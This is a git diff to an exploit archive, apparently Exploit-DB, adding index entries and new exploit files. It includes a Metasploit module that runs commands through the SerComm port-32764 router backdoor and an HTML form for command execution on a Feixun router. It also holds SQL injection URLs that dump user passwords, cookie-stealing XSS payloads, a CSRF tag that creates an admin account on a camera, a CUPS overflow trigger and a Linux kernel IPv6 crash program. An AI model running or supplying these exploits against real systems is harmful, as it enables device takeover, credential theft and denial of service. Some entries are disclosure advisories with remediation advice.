diff --git a/files.csv b/files.csv index 97c4095a9..3557ae6ae 100755 --- a/files.csv +++ b/files.csv @@ -27571,6 +27571,7 @@ id,file,description,date,author,platform,type,port 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 @@ -27615,10 +27616,13 @@ id,file,description,date,author,platform,type,port 30770,platforms/cgi/webapps/30770.txt,"AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection Vulnerability",2007-11-15,"Jan Fry",multiple,remote,0 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 +30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability",2007-11-16,cocoruder,windows,dos,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting Vulnerability",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 Login.ASP Multiple SQL Injection Vulnerabilities",2007-11-17,"Aria-Security Team",asp,webapps,0 +30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 ParseRTSPRequestString Remote Denial Of Service Vulnerability",2007-11-19,"Luigi Auriemma",linux,dos,0 30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 Generic_API_Call.PL Cross-Site Scripting Vulnerability",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0 +30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d Long Vehicle Name Buffer Overflow Vulnerability",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 @@ -27627,6 +27631,7 @@ id,file,description,date,author,platform,type,port 30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 +30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 @@ -27672,6 +27677,7 @@ id,file,description,date,author,platform,type,port 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0 +30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x,Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 daemon_start Local Privilege Escalation Vulnerability",2007-12-03,"Bas van Schaik",linux,local,0 30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 Remote Format String Vulnerability",2007-12-04,"SEC Consult",windows,dos,0 @@ -27684,11 +27690,13 @@ id,file,description,date,author,platform,type,port 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 +30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0 30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0 +30856,platforms/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x Directory Traversal and Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",multiple,dos,0 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 Access Validation And Input Validation Vulnerabilities",2007-12-10,"Tomas Kuliavas",php,webapps,0 @@ -27715,3 +27723,50 @@ id,file,description,date,author,platform,type,port 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 +30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 +30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 +30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0 +30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0 +30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0 +30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 +30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 +30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 +30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 +30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 +30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0 +30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0 +30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0 +30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0 +30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80 +30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30911,platforms/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30912,platforms/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30913,platforms/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30914,platforms/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - CSRF Vulnerability",2014-01-14,"Felipe Molina",hardware,webapps,80 +30915,platforms/hardware/remote/30915.rb,"SerComm Device Remote Code Execution",2014-01-14,metasploit,hardware,remote,32764 +30916,platforms/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80 +30917,platforms/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",php,webapps,80 +30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 'index.php' Local File Include Vulnerability",2007-12-20,JuMp-Er,php,webapps,0 +30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum 'dispatch.cgi' Tcl Command Injection Vulnerability",2007-12-20,niekt0,cgi,webapps,0 +30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 +30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x 'view_entry.php' SQL Injection Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0 +30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 'zfile.c' Stack-Based Buffer Overflow Vulnerability",2007-12-21,"Luigi Auriemma",multiple,dos,0 +30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.PHP ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0 +30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 +30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 +30926,platforms/php/webapps/30926.txt,"Dokeos 1.x work/work.php display_upload_form Action origin Parameter XSS",2007-12-22,Doz,php,webapps,0 +30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 'loadadminpage' Parameter Remote File Include Vulnerability",2007-12-24,Koller,php,webapps,0 +30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 +30929,platforms/php/webapps/30929.txt,"Logaholic update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30930,platforms/php/webapps/30930.txt,"Logaholic index.php parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0 +30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0 +30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 +30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 +30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 +30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0 +30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 'default.asp' Multiple SQL Injection Vulnerabilities",2007-12-24,bypass,asp,webapps,0 +30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 Error Message Remote Script Execution Vulnerability",2007-12-26,anonymous,windows,remote,0 +30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0 +30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0 +30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 diff --git a/platforms/asp/webapps/30938.txt b/platforms/asp/webapps/30938.txt new file mode 100755 index 000000000..0f5abacba --- /dev/null +++ b/platforms/asp/webapps/30938.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27031/info + +Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +These issues affect Web Sihirbazi 5.1.1; other versions may also be affected. + +http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user \ No newline at end of file diff --git a/platforms/asp/webapps/30940.txt b/platforms/asp/webapps/30940.txt new file mode 100755 index 000000000..6d14e022d --- /dev/null +++ b/platforms/asp/webapps/30940.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/27044/info + +iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +All versions are considered vulnerable. + +http://www.example.com/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E + +http://www.example.com/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/30941.txt b/platforms/asp/webapps/30941.txt new file mode 100755 index 000000000..15db6ab80 --- /dev/null +++ b/platforms/asp/webapps/30941.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27044/info + +iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +All versions are considered vulnerable. + +http://www.example.com/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/30919.txt b/platforms/cgi/webapps/30919.txt new file mode 100755 index 000000000..c8a6aeba1 --- /dev/null +++ b/platforms/cgi/webapps/30919.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/26963/info + +SiteScape Forum is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input. + +Attackers can exploit this issue to execute arbitrary commands in the context of the webserver process. Successful exploits could compromise the application and possibly the underlying system. + +http://www.example.com/forum/support/dispatch.cgi/0;command + diff --git a/platforms/hardware/remote/30915.rb b/platforms/hardware/remote/30915.rb new file mode 100755 index 000000000..6ff09eea0 --- /dev/null +++ b/platforms/hardware/remote/30915.rb @@ -0,0 +1,121 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStagerEcho + + def initialize(info={}) + super(update_info(info, + 'Name' => "SerComm Device Remote Code Execution", + 'Description' => %q{ + This module will cause remote code execution on several SerComm devices. + These devices typically include routers from NetGear and Linksys. + Tested against NetGear DG834. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Eloi Vanderbeken ', # Initial discovery, poc + 'Matt "hostess" Andreko ' # Msf module + ], + 'Payload' => + { + 'Space' => 10000, # Could be more, but this should be good enough + 'DisableNops' => true + }, + 'Platform' => 'linux', + 'Privileged' => false, + 'Targets' => + [ + ['Linux MIPS Big Endian', + { + 'Arch' => ARCH_MIPSBE + } + ], + ['Linux MIPS Little Endian', + { + 'Arch' => ARCH_MIPSLE + } + ], + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'OSVDB', '101653' ], + [ 'URL', 'https://github.com/elvanderb/TCP-32764' ] + ], + 'DisclosureDate' => "Dec 31 2013" )) + + register_options( + [ + Opt::RPORT(32764) + ], self.class) + end + + def check + fprint = endian_fingerprint + + case fprint + when 'BE' + print_status("Detected Big Endian") + return Msf::Exploit::CheckCode::Vulnerable + when 'LE' + print_status("Detected Little Endian") + return Msf::Exploit::CheckCode::Vulnerable + end + + return Msf::Exploit::CheckCode::Unknown + end + + def exploit + execute_cmdstager(:noargs => true) + end + + def endian_fingerprint + begin + connect + + sock.put(rand_text(5)) + res = sock.get_once + + disconnect + + if res && res.start_with?("MMcS") + return 'BE' + elsif res && res.start_with?("ScMM") + return 'LE' + end + rescue Rex::ConnectionError => e + print_error("Connection failed: #{e.class}: #{e}") + end + + return nil + end + + def execute_command(cmd, opts) + vprint_debug(cmd) + + # Get the length of the command, for the backdoor's command injection + cmd_length = cmd.length + + # 0x53634d4d => Backdoor code + # 0x07 => Exec command + # cmd_length => Length of command to execute, sent after communication struct + data = [0x53634d4d, 0x07, cmd_length].pack("VVV") + + connect + # Send command structure followed by command text + sock.put(data+cmd) + disconnect + + Rex.sleep(1) + end + +end \ No newline at end of file diff --git a/platforms/hardware/remote/30935.txt b/platforms/hardware/remote/30935.txt new file mode 100755 index 000000000..3cfe1c244 --- /dev/null +++ b/platforms/hardware/remote/30935.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/27024/info + +ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface. + +An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device. + +http://www.example.com:/ping.asp?pingstr=â?> + +The following cross-site request-forgery example was provided: + +Chirstmastime is Here + + + + \ No newline at end of file diff --git a/platforms/hardware/webapps/30900.html b/platforms/hardware/webapps/30900.html new file mode 100755 index 000000000..bccafe1b1 --- /dev/null +++ b/platforms/hardware/webapps/30900.html @@ -0,0 +1,27 @@ +# Exploit Title: [Feixun FWR-604H Wireless Router Remote Code Execution] +# Date: [2014-01-09] +# Exploit Author: [Arash Abedian +(http://www.exploit-db.com/author/?a=6187 +) +# Vendor Homepage: [http://feixun.com.cn] +# Version: [Hardware Version 1.0, Firmware Build: 7642] +# Tested on: [Hardware Version 1.0, Firmware Build: 7642] +# Vulnerability Details: +Feixun FWR-604H 150Mbps Wireless N Router is vulnerable to Remote Code +Execution vulnerability(Hardware Version 1.0, Firmware Build: 7642, Vendor +website:feixun.com.cn). The web server don't authenticate user prior to +system level execution. As such an unauthenticated attacker can easily +remotely exploit the target using system_command parameter in diagnosis.asp +file. + + + +Exploit Feixun FWR-604H +
+ +Command: + + +
+ + \ No newline at end of file diff --git a/platforms/hardware/webapps/30914.txt b/platforms/hardware/webapps/30914.txt new file mode 100755 index 000000000..7a207a59d --- /dev/null +++ b/platforms/hardware/webapps/30914.txt @@ -0,0 +1,71 @@ +**General Details** + +Affected Product: Conceptronic camera CIPCAMPTIWL +Tested Firmware: 21.37.2.49 +Tested Web UI Firmware: 0.61.4.18 +Assigned CVE: CVE-2013-7204 +CVSSv2 Base Score: 5.8 (AV:N/AC:M/AU:N/C:P/I:P/A:N) +Vulnerability Type: Cross-Site Request Forgery [CWE-352] +Solution Status: Not Fixed +Vendor Notification Timeline: + - 23/12/2013: Contacting with technical support through their web +form http://www.conceptronic.net/supcon.php?action=init + - 23/12/2013: Contacting with general information email addres +(info@conceptronic.net) to inform about the vulnerability and request +suitable security or technical contact to send the complete details of +the CSRF. + - 25/12/2013: Contacting with public twitter accounts +@conceptronic and @conceptronic_es to request suitable security or +technical contact to send the complete details of the CSRF. + - 28/12/2013: Recontacting the technical support. + - 28/12/2013: Recontacting general information address +info@conceptronic.net. + - 02/01/2014: Trying to conntact with security@conceptronic.net y +vulnerabilities@conceptronic.net but they are non existent addresses. + - 03/01/2014: Involve Inteco CERT in the notification proccess. + - 08/01/2014: Inteco confirms that there is still no response from +Conceptronic. + +None of the comunication atempts with the vendor received a response, +so I'm publishing the advisory to warn users and confirm the +vulnerability with you. + +**Vulnerabilitty details** + +The CSRF is present in the CGI formulary used to create and modify +users of the web interface of the camera (/set_users.cgi). This CSRF +would allow a malicious attacker to create users in the camera web +interface (including administrator users) if he is able to lure the +legitimate administrator of the camera to visit a web controlled by +the attacker. + +An example of the process to exploit this vulnerability: + +1- A webcam administrator is already logged in the camera web interface. + +2- A malicious user knows it and send a link to this administrator +pointing to a web controlled by this attacker +(http://example.com/conceptronic_csrf.html). In this web, the attacker +placed an image with the following code: + + csrf image + +3- The webcam administrator visit the link. + +4- The page http://example.com/test_csrf.html tries to load the image +by making a GET request to the pointed URL, thus, making the +legitimate administrator to create a new user identified by "attacker" +and password "attacker". + +A video was uploaded to youtube showing this behaviour: + +https://www.youtube.com/watch?v=URXEe_VRc74 + +This issue can be fixed by adding an additional step to the user +creation CGI, either requesting the administrator password again +before creating/modifying any user or creating a hidden random token +for each form (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet) + +-- +Felipe Molina de la Torre \ No newline at end of file diff --git a/platforms/linux/dos/30776.txt b/platforms/linux/dos/30776.txt new file mode 100755 index 000000000..e27a0c9d6 --- /dev/null +++ b/platforms/linux/dos/30776.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26488/info + +LIVE555 Media Server is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. + +Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. + +LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/30776.zip \ No newline at end of file diff --git a/platforms/linux/dos/30837.txt b/platforms/linux/dos/30837.txt new file mode 100755 index 000000000..72f8dcdb2 --- /dev/null +++ b/platforms/linux/dos/30837.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26666/info + +QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input. + +Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of the issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. + +QEMU 0.9.0 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/30837.rar \ No newline at end of file diff --git a/platforms/linux/dos/30898.pl b/platforms/linux/dos/30898.pl new file mode 100755 index 000000000..162d8aa2f --- /dev/null +++ b/platforms/linux/dos/30898.pl @@ -0,0 +1,50 @@ +source: http://www.securityfocus.com/bid/26917/info + +Common UNIX Printing System (CUPS) is prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. + +Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software. Failed exploit attempts will likely result in denial-of-service conditions. + +This issue affects CUPS 1.2 and 1.3, prior to 1.3.5; other versions may also be vulnerable. + +P0C: +=== +#!/usr/bin/perl +#if 0 +# backend_snmp_poc.pl write by wei_wang@mcafee.com +# 2007-11-06 +# +# snmp.c asn1_get_string integer overflow cups 1.3.4 +# +# packet->error = "No community name"; +# else if ((length = asn1_get_length(&bufptr, bufend)) == 0) +# packet->error = "Community name uses indefinite length"; +# else +# { +# asn1_get_string(&bufptr, bufend, length, packet->community, +# sizeof(packet->community)); +# +# if ((packet->request_type = asn1_get_type(&bufptr, bufend)) +# +#002a: 30 38 tag=0x30 len=0x38 +#002c: 02 01 00 version:1 (0) +#002f: 04 84 ff ff ff ff 69 63 community:public +#len is 0xffffffff +#endif + +my $payload ="\x30\x38\x02\x01\x00\x04\x84\xff\xff\xff\xff\x41\x41"; + +use strict; +my $PF_INET=2; +my $SOCK_DGRAM=2; +my $port=161; +my $proto=getprotobyname('udp'); +my $addres=pack('SnC4x8',$PF_INET,$port,0,0,0,0); +my ($Cmd); +socket(SOCKET,$PF_INET,$SOCK_DGRAM,$proto) or die "Can't build a socket"; +bind (SOCKET,$addres); +while(1) +{ + my $rip=recv (SOCKET,$Cmd,100,0); + send (SOCKET,$payload,0,$rip) or die "send false"; + print "$Cmd"; +} \ No newline at end of file diff --git a/platforms/linux/dos/30902.c b/platforms/linux/dos/30902.c new file mode 100755 index 000000000..0f3a9b164 --- /dev/null +++ b/platforms/linux/dos/30902.c @@ -0,0 +1,150 @@ +source: http://www.securityfocus.com/bid/26943/info + +The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers. + +Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users. + +/* + * Clemens Kurtenbach + * PoC code for exploiting the jumbo bug found in + * linux kernels >=2.6.20 and <=2.6.21.1 + * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash + * + */ + + +/* io */ +#include +#include +#include + +/* network */ +#include +#include +#include +#include +#include +#include + +#define MY_FRAME_LEN 1145 + +char *resolve6(unsigned char *target) { + char *ret_addr; + struct in6_addr my_in6; + char *glob_addr = (char *) &my_in6; + struct addrinfo addr_hints, *addr_result; + unsigned char out[64]; + + memset(&addr_hints, 0, sizeof(addr_hints)); + addr_hints.ai_family = AF_INET6; + + if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { + printf("getaddrinfo() error\n"); + exit(1); + } + if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, +out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ + printf("getnameinfo() error\n"); + exit(1); + } + if(inet_pton(AF_INET6, out, glob_addr) < 0) { + printf("inet_pton() error\n"); + exit(1); + } + if((ret_addr = malloc(16)) == 